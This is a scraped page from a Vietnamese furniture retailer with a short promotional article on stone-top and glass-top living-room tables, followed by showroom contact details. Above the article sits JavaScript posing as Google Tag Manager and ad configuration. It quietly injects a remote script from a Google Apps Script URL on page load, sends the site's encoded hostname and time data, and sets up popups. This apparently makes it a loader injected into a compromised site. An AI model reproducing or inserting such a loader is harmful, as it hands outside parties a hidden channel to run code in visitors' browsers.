var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Bàn khách đẹp nên chọn chất liệu nào?

Bàn trà là một trong những món đồ quan trọng không thể thiếu trong các không gian phòng khách hiện đại. Trên thị trường hiện nay bàn khách được làm từ nhiều chất liệu khác nhau cho khách hàng lựa chọn. Vậy bàn khách đẹp nên chọn chất liệu nào? Cùng tìm kiếm câu trả lời qua bài viết sau của Nội Thất Xinh nhé.

Bàn khách đẹp mặt đá

Các mẫu bàn trà mặt đá cao cấp hiện là sự lựa chọn được nhiều gia đình ưu ái hiện nay. Bàn phòng khách đẹp này tạo sức hút đặc biệt từ mặt bàn sáng bóng cùng với đó là các đường vân cực sang. Đây có thể coi là mẫu bàn trà vừa đảm bảo tính thẩm mỹ cũng như cùng với đó có độ bền đẹp lâu dài trong suốt thời gian sử dụng.
 
bàn khách đẹp
Mẫu bàn trà mặt đá đẹp được nhiều gia đình lựa chọn


Với bàn trà mặt đá bạn cũng sẽ dễ dàng kết hợp cùng các đồ nội thất khác để giúp hoàn thiện không gian sống của gia đình mình. Có thể kết hợp cùng ghế sofa da để mang đến không gian cực sang. Cùng với đó sự đa dạng về mẫu mã cũng giúp mang đến nhiều sự lựa chọn cho các gia đình hiện nay.

Bàn khách đẹp mặt kính

Nếu bạn muốn có không gian phòng khách hiện đại thì các mẫu bàn khách đẹp mặt kính sẽ là sự lựa chọn không nên bỏ qua. Với mặt kính cường lực sáng bóng cho không gian rộng rãi, thoáng đãng cũng như cùng với đó giúp căn phòng trở nên bừng sáng.

 bàn khách đẹp

Mẫu bàn kính đẹp cho không gian hiện đại


Với các mẫu bàn trà phòng khách này các bạn cũng sẽ dễ dàng kết hợp cùng các đồ nội thất khác. Sở hữu thiết kế tối giản, hiện đại cùng với đó là mức giá thành không quá cao nên có thể phù hợp cho mức chi phí của nhiều gia đình.

Nội Thất Xinh hiện có rất nhiều mẫu bàn khách đẹp đa dạng chất liệu cho khách hàng lựa chọn. Chúng tôi cam kết mức giá cả tốt nhất cũng như chất lượng. Đến ngay showroom tại số 321 Trường Chinh – Thanh Xuân hoặc liên hệ hotline 0975.90.3333 để được tư vấn cụ thể nhé.

>>>Xem thêm: Xu hướng chọn bàn trà đá cho phòng khách hiện đại